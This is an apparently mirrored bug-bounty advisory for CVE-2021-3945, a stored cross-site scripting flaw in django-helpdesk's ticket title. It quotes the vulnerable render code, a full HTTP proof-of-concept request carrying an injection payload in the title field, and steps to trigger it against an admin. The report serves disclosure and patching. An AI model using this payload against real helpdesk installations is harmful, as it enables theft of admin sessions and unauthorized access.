Lucene search
Noobpk745F483C-70ED-441F-AB2E-7AC1305439A4HistoryNov 03, 2021 - 7:33 a.m.
Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk
2021-11-0307:33:39
noobpk
www.huntr.dev
11
xss
stored
javascript
payload
security
vulnerability
admin
user account
csrf token
unauthorized access
bug bounty
EPSS
0.001
Percentile
33.1%
Description
Stored XSS via parameter [title] when create new ticket
Details
At the table tickets in admin, when rendering data for column [Ticket] it allows for arbitrary execution of JavaScript
Vulnerability code
{
data: "ticket",
render: function (data, type, row, meta) {
if (type === 'display') {
data = '<div><a href>' +
row.id + '. ' +
row.title + '</a></div>';
}
return data
}
},
Render with [title] contain payload
<td><div><a href="/tickets/57832/">57832. "><img src></a></div></td>
Proof of Concept
// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: django-helpdesk-demo.herokuapp.com
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Origin: https://django-helpdesk-demo.herokuapp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="csrfmiddlewaretoken"
Sn6i713aQfmhgW3ET6Q39tRXE3yt0kePKM6tsSFZEw266gb1EYyqakPSJyAJ1ByV
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="queue"
1
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="title"
"><img src>
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="body"
test
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="priority"
3
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="due_date"
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="submitter_email"
[email protected]
-----------------------------35329910622610784793670383726--
Step to Reproduct
Goto URL without login to create a new ticket: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
At field [Summary of the problem] input with payload: "><img src>
The XSS will trigger when the admin load all tickets
Impact
This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
Related
osv
osv
CVE-2021-3945
2021-11-13 09:15:07
Cross-site Scripting in django-helpdesk
2021-11-15 23:12:41
PYSEC-2021-430
2021-11-13 09:15:00
veracode
veracode
Cross-Site Scripting (XSS)
2021-11-15 05:09:04
prion
prion
Cross site scripting
2021-11-13 09:15:00
cvelist
cvelist
cve
cve
CVE-2021-3945
2021-11-13 09:15:07
nvd
nvd
CVE-2021-3945
2021-11-13 09:15:07
github
github
Cross-site Scripting in django-helpdesk
2021-11-15 23:12:41
cnvd
cnvd
Django-Helpdesk Cross-Site Scripting Vulnerability
2021-11-16 00:00:00